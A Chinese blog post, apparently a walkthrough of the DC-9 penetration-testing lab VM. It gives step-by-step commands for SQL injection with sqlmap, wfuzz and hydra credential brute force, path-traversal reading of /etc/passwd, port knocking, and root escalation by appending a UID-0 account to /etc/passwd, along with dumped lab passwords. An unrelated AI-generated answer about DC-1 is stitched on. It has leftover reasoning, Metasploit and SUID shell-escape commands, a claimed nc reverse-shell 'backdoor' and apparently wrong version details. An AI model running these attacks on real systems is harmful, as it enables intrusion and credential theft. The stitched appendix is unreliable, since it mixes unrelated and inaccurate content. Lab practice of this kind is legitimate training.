DC-9 靶场

 靶机地址:链接:https://pan.baidu.com/s/1kMLviFtz2JosS422-L1Tgw
提取码:c5ur

 1.主机发现

nmap -sP 192.168.128.1/24
arp-scan -l               #得到IP    192.168.128.131

2.端口扫描

nmap -p 1-65535 -A 192.168.128.131        # 22 80端口

 3.目录扫描

dirb http://192.168.128.131
或者nikto -host 192.168.128.131    这个查询到了config.php   但是打不开

 4.操作网站找信息

#发现查询点:
万能密码注入尝试:' or 1=1 -- -
#F12看到是post请求,抓包看到search参数
sqlmap -u "http://192.168.128.131/results.php" --data "search=1" --dbs    查看所有的库名
sqlmap -u "http://192.168.128.131/results.php" --data "search=1" -D users --tables
sqlmap -u "http://192.168.128.131/results.php" --data "search=1" -D users -T UserDetails --columns
sqlmap -u "http://192.168.128.131/results.php" --data "search=1" -D users -T UserDetails --dump
这里更推荐直接全部dump 
##notepad可以直接按住alt区域选择复制,这样可以把很多的账密分开做成字典。
#暴力破解:WFuzz
wfuzz -z file,name.txt -z file,password.txt -d "username=FUZZ&password=FUZ2Z" http://192.168.128.131/manage.php #这里POST请求必须使用 -d   
wfuzz -z file,name.txt -z file,passwd.txt --hw 93 -d "username=FUZZ&password=FUZ2Z" http://192.168.128.131/manage.php
wfuzz -z file,name.txt -z file,passwd.txt --hh 1248 -d "username=FUZZ&password=FUZ2Z" http://192.168.128.131/manage.php
#没找到
**#尝试第二个数据库 Staff的信息。**
sqlmap -u "http://192.168.128.131/results.php" --data "search=1" -D Staff -T Users  --dump
#找参数    #尝试了hw hh 的过滤方式,找不到对应的参数。  FUZZ后面带文件名(index.php,etc/passwd等),不带都尝试,考虑是字典还是参数不对。最后,想到回到根目录的   etc/passwd  使用../  
wfuzz -b 'PHPSESSID=in952k2in45a06pcdmht1aepi3' --hw 100 -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.128.131/manage.php?FUZZ=../../../../../../etc/passwd

 5.爆破登录

#看到很多操作系统账号密码。这里爆破操作系统的账号密码。但是并不行
hydra -L name.txt -P passwd.txt 192.168.128.131 ssh  
**#22端口打开了,但是不能连接的原因?**
**1. 防护墙**
**2.所选用户不能使用22端口登录**
**3.linux服务:敲门 Knockd,确认方式:文件位置    /etc/knockd.conf    访问文件看到7469 **
**#用nmap对应敲门,只要访问了,就会打开的端口**
**nmap -p 7469 192.168.128.131**
**nmap -p 8475 192.168.128.131**
**nmap -p 9842 192.168.128.131**
#再次使用hydra爆破:  这里发现保存的字典,不能有任何空格
hydra -L name-dict -P passwd-dict 192.168.128.131 ssh
#登录
ssh janitor@192.168.128.131 输入密码即可
#登录成功还是老操作。看东西:
1. history
2. ls -a 
3。 sudo -l
#发现密码,放到字典。继续hydra爆破:
hydra -L name-dict -P passwd-dict 192.168.128.131 ssh
**#登录成功,重复操作,sudo -l有信息:以root的身份执行操作程序**
./opt/devstuff/dist/test/test   执行   #python test.py read append   读取内容追加内容的意思
#怎么找test.py的文件位置?
find / - name "test.py" 
find / -name "test.py" 2>/dev/null   # 2代表标准错误输出,过滤到某地
cat /opt/devstuff/test.py

 6.提取

#/etc/passwd的文件格式:密码是x的原因,在/etc/shadow里面,放在etc/passwd也可以
#第三位和第四位的数字是uid和gid,root用户是0 
#第五位是用户描述,第六位是用户的工作目录,第七位命令 解释程序(执行命令的工具)
**这里提取思路:创建一个用户    把uid和gid都设为0即可,加密方式得是hash加密。利用python的脚本,追加到test.py**
openssl passwd  -1 -salt  admin 123456       $1$admin$LClYcRe.ee8dQwgrFc5nz.
完整的账密应该是:  admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.
admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash    最后的解释脚本目录
在有权限的用户的下输入  echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
sudo ./test /tmp/passwd  /etc/passwd 
#可以看到新增了一个用户
cat /etc/passwd  
su root
输入密码

7.笔记本:(记录收集到的信息和思路)

22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))   #有apache   有/var/www目录
网页主页有一堆个人信息
目录扫描:
==> DIRECTORY: http://192.168.128.131/css/                                                                          
==> DIRECTORY: http://192.168.128.131/includes/   #没用

+---------------+-----------+
| password      | username  |
+---------------+-----------+
| 3kfs86sfd     | marym     |
| 468sfdfsd2    | julied    |
| 4sfd87sfd1    | fredf     |
| RocksOff      | barneyr   |
| TC&TheBoyz    | tomc      |
| B8m#48sd      | jerrym    |
| Pebbles       | wilmaf    |
| BamBam01      | bettyr    |
| UrAG0D!       | chandlerb |
| Passw0rd      | joeyt     |
| yN72#dsd      | rachelg   |
| ILoveRachel   | rossg     |
| 3248dsds7s    | monicag   |
| smellycats    | phoebeb   |
| YR3BVxxxw87   | scoots    |
| Ilovepeepee   | janitor   |
| Hawaii-Five-0 | janitor2  |
+---------------+-----------+
第一个数据库账密不行     换数据库查
admin  transorbital1
看到一个。。。。**File does not exist  **
**考虑考虑文件包含---》找参数。。**
这里**注意:在登录时找参数,所以,直接用wfuzz找参数是一个没登陆的状态。带上cookie值,才是以登录的状态查找cookie值**
参数为     "file"

[22][ssh] host: 192.168.128.131   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.128.131   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.128.131   login: janitor   password: Ilovepeepee
后面收集到的
login: fredf   password: B4-Tru3-001

import sys


if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)


else :
    f = open(sys.argv[1], "r")
    output = (f.read())


    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()
读取任意文件内容,追加到任意文件中去
<think>好的,我现在需要帮助用户查找与DC-1靶场相关的IT内容或项目。首先,用户提供的引用中有提到DC-1渗透靶场实战速通版,引用[4]提到了一些具体步骤,比如退出数据库、查看用户信息等。这可能意味着DC-1是一个用于渗透测试练习的靶机,常见于网络安全训练中。 接下来,我需要确认DC-1靶场的基本信息。通常,像DC-1这样的靶场是设计用来模拟真实环境中的漏洞,供安全研究人员和爱好者练习渗透测试技术。根据引用[3],里面提到了Drupal 8、PHP、Apache、Debian系统,这些可能是DC-1靶场使用的技术栈。用户可能想知道靶场的技术实现细节,比如包含哪些漏洞,如何搭建,或者如何利用这些漏洞进行渗透。 然后,我需要检查用户提供的引用是否有其他相关信息。引用[1]是关于加入技术社群的,引用[2]看起来像是一个反向shell的命令,可能与渗透测试中的利用方法有关,而引用[4]提到了具体的渗透步骤,如查看/etc/passwd文件,这可能涉及到用户枚举或权限提升的环节。 用户的问题是要查找与DC-1靶场相关的IT项目或技术实现,所以需要整理这些信息,说明DC-1靶场可能涉及的技术组件、漏洞类型以及渗透测试的方法。例如,Drupal可能存在已知漏洞,如CVE-2018-7600,Apache的版本可能有配置问题,Debian系统可能涉及内核漏洞等。此外,用户可能对如何搭建这样的靶场或进行实战演练感兴趣,所以需要涵盖搭建步骤和渗透路径。 另外,需要确保回答符合系统级指令,比如使用正确的中文,数学公式的格式(虽然这里可能用不到),以及生成相关问题。同时,引用需要正确标注,比如引用[3]和[4]中的信息。 最后,生成的相关问题需要围绕DC-1靶场的技术细节、渗透方法、漏洞分析以及学习资源展开,帮助用户进一步探索。</think>关于DC-1靶场的技术实现与应用,以下是关键信息整理: ### DC-1靶场概述 DC-1是专为渗透测试训练设计的虚拟机靶场,模拟了包含多个漏洞的Web应用环境。其核心组件包括: - **CMS系统**:Drupal 8(存在CVE-2018-7600远程代码执行漏洞)[^3] - **Web服务**:Apache HTTP Server 2.4.25 - **操作系统**:Debian Linux - **数据库**:MySQL/MariaDB(通过`tac /etc/passwd`可发现数据库用户信息)[^4] ### 渗透测试路径示例 1. **漏洞利用**:通过Drupalgeddon2漏洞获取初始立足点 ```bash msfconsole> use exploit/unix/webapp/drupal_drupalgeddon2 set RHOSTS <靶机IP> exploit ``` 2. **权限提升**:利用Linux内核漏洞或SUID提权(如发现`find`命令具有SUID权限): ```bash find / -exec /bin/sh \; -quit ``` 3. **敏感信息获取**:通过`/etc/passwd`分析用户列表,`/var/www`目录查找数据库凭证 ### 技术实现特点 - **多层防御突破**:包含Web应用漏洞、操作系统配置缺陷、数据库安全防护等复合型漏洞 - **真实环境模拟**:采用LAMP架构(Linux+Apache+MySQL+PHP)构建企业级应用场景 - **隐蔽后门设计**:存在可通过`nc 192.168.233.130 55555`建立反向Shell的网络通道[^2]
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值